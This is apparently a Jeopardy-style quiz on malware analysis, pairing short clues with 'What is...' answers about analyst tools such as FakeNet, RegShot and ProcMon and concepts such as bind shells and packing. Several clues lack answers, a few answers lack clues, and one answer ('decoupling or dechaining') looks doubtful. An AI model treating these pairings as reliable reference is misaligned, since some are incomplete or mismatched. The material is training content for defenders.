A tool to extract strings from PE files or a piece of string used to clean your teeth.
What is Floss?
An Internet simulator found in Windows Flare VM requiring the VirtualBox network adapter be set to NAT mode.
What is FakeNet?
Type of shell where the victim's machine waits and listens for the attacker to connect.
What is a bind shell?
A tool that can aid in identifying what persistence method has been put in place by malware.
What is Autoruns?
It is how a malware sample can be kept safe and prevent accidental detonation.
What is defanged?
A popular website for identifying malware by either uploading samples or uploading hash values.
What is Virus Total?
A network monitoring tool to capture network based indicators.
What is Wireshark?
The most common type of obfuscation technique used in PowerShell scripts.
What is base64?
A tool used to capture the state of the Windows registry before and after malware is detonated for comparison.
What is RegShot?
What is a dropper?
A popular hashing algorithm used to identify malware. Aww Shawks.. they found me!
What is SHA256?
It's the server that the malware connects to which then instructs the malware on how to behave.
Type of shell where the victim machine reaches out and connects to the attaker.
A way in which attackers compress malware to obfuscate it and attempt to evade anti-virus solutions.
What is packing?
The HTTP command used to request and pull files from URLs.
What is GET?
A tool used to identify the architecture of PE files and the API's that are imported that also sounds like a very large animal (Black, Brown, or a White kind).
What is PE Bear?
An Internet Simulator built into REMnux.
What is Inetsim?
A scripting language that is normally used in Windows to automate processes by Administrators but attackers also use to manipulate files, exfiltrate data, or download malware to the victim's computer.
What is PowerShell?
Malware will sometimes create this to prevent multiple instances of itself from running.
What are mutexes?
Two terms used when an attacker names the second stage malware downloaded from a server to something else when saved to the victim machine.
What are decoupling or dechaining?
A tool used to de-obfuscate encoded or encrypted data - it's good with knives.
A tool that allows for the real time monitoring of malware on a host by filtering on the malware's name that also shows parent and child processes.
What is ProcMon?
What is Netcat?
A Linux binary or Santa's little helper.
What is an ELF?
The file extension or file type for Windows API's that are imported in PE files to make use of the functions they contain.
What are DLL files?